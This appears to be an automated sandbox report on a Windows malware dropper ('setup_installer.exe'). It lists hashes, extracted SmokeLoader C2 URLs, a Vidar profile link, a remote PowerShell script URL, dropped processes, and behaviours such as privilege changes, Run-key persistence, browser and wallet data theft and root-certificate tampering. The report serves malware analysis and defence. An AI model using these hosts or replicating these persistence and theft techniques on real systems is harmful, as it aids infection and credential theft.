Resubmissions
28-10-2021 15:53
211028-tbqhfabhb2 1028-10-2021 05:27
211028-f5paksheak 1027-10-2021 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
338s -
max time network
1803s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
28-10-2021 15:53
Static task
static1
Behavioral task
behavioral1
Sample
setup_installer.exe
Resource
win7-en-20210920
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 4 IoCs
resource yara_rule behavioral1/files/0x0005000000013043-113.dat family_socelars behavioral1/files/0x0005000000013043-145.dat family_socelars behavioral1/files/0x0005000000013043-152.dat family_socelars behavioral1/files/0x0005000000013043-188.dat family_socelars -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/3008-312-0x0000000000400000-0x0000000002C15000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x00050000000125df-62.dat aspack_v212_v242 behavioral1/files/0x00050000000125df-63.dat aspack_v212_v242 behavioral1/files/0x0007000000012296-64.dat aspack_v212_v242 behavioral1/files/0x0007000000012296-65.dat aspack_v212_v242 behavioral1/files/0x00050000000125f2-68.dat aspack_v212_v242 behavioral1/files/0x00050000000125f2-69.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 54 IoCs
pid Process 568 setup_install.exe 1984 Wed09b3a5ca1a712d390.exe 1208 Wed096a1bff61.exe 956 Wed0901eb1dae126e32.exe 1544 Wed09f257bb7877d00b2.exe 552 Wed0971f17486f8.exe 1648 Wed09d8d6edfaff2ac.exe 1104 Wed09db0d52c38.exe 1760 Wed09c42cad92c20f79.exe 1952 Wed09cfb2f9758281d8.exe 1680 Wed09abf83d9c2.exe 1816 Wed09e95ff6b5.exe 1168 Wed09b2a8bc4f16cb.exe 908 Wed09d27135e5a8b3b.exe 432 Wed094c47c32b.exe 320 Wed09977fdc12334.exe 2176 Wed09abf83d9c2.exe 2220 Wed09d27135e5a8b3b.tmp 2292 3071403.exe 2328 Wed09d27135e5a8b3b.tmp 2784 LzmwAqmV.exe 2900 BCleanSoft82.exe 2956 inst1.exe 3008 Soft1WW02.exe 3040 4.exe 776 5.exe 1300 search_hyperfs_206.exe 2252 run.exe 2336 postback.exe 2552 uGddXyqbmjdbc7Sq8dP6sCg_.exe 1508 run2.exe 1572 rmCgodR4hKzuKTKdZIMofbLp.exe 2280 setup.exe 1076 7637304.exe 1004 4763433.exe 888 8908199.exe 2608 7094118.exe 2292 3071403.exe 1928 wangting-game.exe 1580 5856220.exe 2028 2833926.exe 1272 8225450.exe 2988 7225029.exe 2660 7695555.exe 2904 WinHoster.exe 1296 net1.exe 3084 10.exe 3176 cmd.exe 1748 kPBhgOaGQk.exe 1224 services64.exe 2692 Wed0971f17486f8.exe 3124 net.exe 3584 F4CA.exe 2464 sihost64.exe -
Possible privilege escalation attempt 8 IoCs
pid Process 2488 icacls.exe 832 icacls.exe 2440 takeown.exe 3964 icacls.exe 704 icacls.exe 2460 icacls.exe 2636 icacls.exe 3300 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Wed09d8d6edfaff2ac.exe Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Wed09977fdc12334.exe -
Loads dropped DLL 64 IoCs
pid Process 1608 setup_installer.exe 1608 setup_installer.exe 1608 setup_installer.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 1524 cmd.exe 1956 cmd.exe 2000 cmd.exe 2000 cmd.exe 960 cmd.exe 860 cmd.exe 1736 cmd.exe 1736 cmd.exe 240 cmd.exe 1984 Wed09b3a5ca1a712d390.exe 1984 Wed09b3a5ca1a712d390.exe 552 Wed0971f17486f8.exe 552 Wed0971f17486f8.exe 956 Wed0901eb1dae126e32.exe 956 Wed0901eb1dae126e32.exe 1932 cmd.exe 1932 cmd.exe 1432 cmd.exe 1432 cmd.exe 1808 cmd.exe 1104 Wed09db0d52c38.exe 1104 Wed09db0d52c38.exe 1548 cmd.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 288 cmd.exe 1628 cmd.exe 1628 cmd.exe 828 cmd.exe 1968 cmd.exe 1952 Wed09cfb2f9758281d8.exe 1952 Wed09cfb2f9758281d8.exe 1168 Wed09b2a8bc4f16cb.exe 1168 Wed09b2a8bc4f16cb.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 908 Wed09d27135e5a8b3b.exe 908 Wed09d27135e5a8b3b.exe 1680 Wed09abf83d9c2.exe 1680 Wed09abf83d9c2.exe 432 Wed094c47c32b.exe 432 Wed094c47c32b.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 1680 Wed09abf83d9c2.exe 908 Wed09d27135e5a8b3b.exe 2176 Wed09abf83d9c2.exe 2176 Wed09abf83d9c2.exe 2220 Wed09d27135e5a8b3b.tmp 2220 Wed09d27135e5a8b3b.tmp 2220 Wed09d27135e5a8b3b.tmp 2220 Wed09d27135e5a8b3b.tmp 2292 3071403.exe -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 3300 icacls.exe 2488 icacls.exe 832 icacls.exe 2440 takeown.exe 3964 icacls.exe 704 icacls.exe 2460 icacls.exe 2636 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3071403.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 68 ipinfo.io 70 ipinfo.io 13 ip-api.com 67 ipinfo.io -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2252 set thread context of 2148 2252 run.exe 98 PID 552 set thread context of 2692 552 Wed0971f17486f8.exe 86 -
autoit_exe 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000013049-128.dat autoit_exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-DD8PQ.tmp Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 2976 320 WerFault.exe 63 1604 3040 WerFault.exe 76 688 1648 WerFault.exe 53 2860 776 WerFault.exe 77 3652 3008 WerFault.exe 75 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3784 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 2792 taskkill.exe 2908 taskkill.exe 2380 taskkill.exe 3344 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E299C8D0-3806-11EC-9784-5E1058BB65BD} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "342201289" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a60000000002000000000010660000000100002000000074e49802d27890f5c8e754290a9efd31284425c84219fd7726299a5aded7ba40000000000e8000000002000020000000041ad2e0297d04fb592d5776f308e5718863f5aa9580dd5ac5fefc77cba28faa20000000d8684b51ce5181081f71a33183d3beb57201d6b4f0db10443218433e208d25c740000000448778d7b94bdab26ecbfc0a440cf573ea8d218cbf5ab6ee547da01c77421b1754e57223f8de4ab0d0c6491baed4a5db09cada9ba39f8bf3f2d62e97dcd10149 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9099f0d113ccd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000b8269215314b83e7a57e3ff44a0688957d992bdf3372f0d49aabc2c0c4f5c1df000000000e8000000002000020000000f0d82cc5bf25c8f1c40222c742bfad1c0b6a4905794db7afe06f76ff6f362c44900000006499ee0c16cda194724bbf761dffa170d80c9a1dbaeea5b7f0e3ea95dacf349a62b5e10db6810af97900dd5b44ba9f121972d6f19a3a0506643e2ecf9370d8a7a7e7275318866eb4a558f98fb53ccff1700fec1421fbb710cadaabac36b42f9aeee1af8594d8ba2f47226a7ec581d67418ca681da13603a1306242badfc66f9c5997c3a77dd1822d09b81b25f253c1d040000000aef212bb8f265e2018b5dacd2c9a6e74e8bc91dbba4c483fe94ade9d2d8b4284a761d1d837405eb4a5d043bfa1c89517e15866245258a3346305a1769c8523ea iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3752 reg.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Wed09db0d52c38.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Wed09db0d52c38.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Wed09d8d6edfaff2ac.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Wed09d8d6edfaff2ac.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Wed09d8d6edfaff2ac.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 4.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
